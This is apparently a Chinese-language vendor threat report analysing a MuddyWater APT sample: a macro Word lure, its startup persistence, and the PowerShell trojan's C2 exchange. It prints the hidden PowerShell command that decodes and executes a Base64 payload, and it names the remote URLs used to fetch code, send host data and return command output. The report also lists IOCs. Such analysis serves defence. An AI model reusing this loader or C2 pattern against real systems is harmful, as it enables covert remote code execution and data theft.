MuddyWater(污水)最新攻击样本分析

发布时间 2019-05-10

MuddyWater是一个来自于伊朗的主要针对中东地区进行攻击的APT组织,其攻击目标主要集中于政府、电信及能源等领域。

近日,启明星辰金睛安全研究团队通过VenusEye威胁情报中心狩猎系统捕获到一个可疑文档,经过分析确认其为MuddyWater最新攻击样本。


载荷分析


攻击样本为一个Word文档,打开后会显示如下图片,诱使受害者启用宏。


宏代码执行后,会释放c:\programdata\SysTextEnc.ini文件。该文件内容为一串Base64编码数据。

然后向启动项写入如下命令行:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"

用于开机解密并执行c:\programdata\SysTextEnc.ini文件。解密之后为一段powershell代码,该代码用于请求hxxp://38.132.99.167/crf.txt链接的数据并执行,该链接返回的数据仍然是一段Powershell代码。
 



木马分析


上述过程中下载的Powershell代码即MuddyWater组织惯用的powershell木马。

解混淆后,其主函数如下所示:


依次执行wlChecul,pmrHlsl,GECOANOO,gfxEcmdascrsltp这四个函数。其中wlChecul只是为了确认服务器准备状态。构造如下URL并以POST方式发送请求:
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater

如果返回值不为空且不为%COPYTHAT%才会执行后续函数。之后执行pmrHlsl函数,该函数会调用WMI获取多种计算机信息。
 

将获得的信息使用“*”进行拼接。计算拼接后字符串的MD5,再和“*1997* EP1”进行拼接,最后进行base64编码。

 
之后将构造出来的Base64编码数据拼接成如下URL并以POST方式发送出去:
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]

如果返回结果不为空并且不为%BYE%则继续后续函数的执行。接下来要执行的函数为GECOANOO。

GeCOANOO函数构造如下数据,并以POST方式将其发送出去:
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]

其中的EncryptedData即上一次发送数据中进行Base64编码的MD5部分。如果返回结果不为空且返回值经过base64解码后不为"SHH",则将解码后的返回值赋值给一个全局变量gecdrEu,然后执行下一个函数,可以判断赋值给gecdrEu的数据为一段powershell代码。
 

最后通过gfxEcmdascrsltp函数执行全局变量中的gecdrEu中的powershell代码。
 

并将返回值进行base64编码,拼凑成如下的URL格式进行上传。
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]


溯源分析


通过VenusEye威胁情报中心关联系统,我们发现了另一个早期的样本。


该样本所使用的技术都与本次我们发现的样本如出一辙。

通过溯源分析,我们发现这两个样本都与友商4月10日在社交媒体上披露的MuddyWater攻击土耳其的样本相似。下面是两者的宏代码对比。



通过对比可以发现,二者都使用相同的方式获取计算机信息,然后使用相同的计算方式计算受害者主机的唯一标识。

 


相比之下,早期发现的样本将上线请求、获取powershell代码、上传命令行执行结果拆分成不同PHP进行交互。而现在的版本则使用同一个PHP文件进行交互。并且早期版本如果在执行过程中遇到错误,则会将错误信息记录日志,但是最新版本则直接结束当前程序。

对于执行流程来说,最新版本相对于早期版本也有较大不同,二者的执行流程如下:



 
相比之下,最新的攻击活动增加了其基础设施,并且将主体代码放置到远程服务器中而不是直接通过钓鱼文档释放到本地。可以看出该组织在不断的更新其攻击方式和防检测方式。



总结


MuddyWater组织自披露之初一直活跃至今,该组织非常青睐使用Powershell脚本来编写其攻击工具,并衍生出了该组织的专有木马POWERSTATS。虽然该组织的Powershell木马更新换代很快,但是我们仍能从其powershell代码中看到些许POWERSTATS的影子。


威胁指标(IOC)


97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt


解决方案


1、启明星辰VenusEye威胁情报中心已经支持对本次攻击活动相关情报的查询。

2、 已部署启明星辰IDS、IPS产品的客户请升级事件库到最新版本,即可有效检测或阻断攻击。

3、 已部署启明星辰APT检测产品的客户无需升级,即可有效检测此次攻击。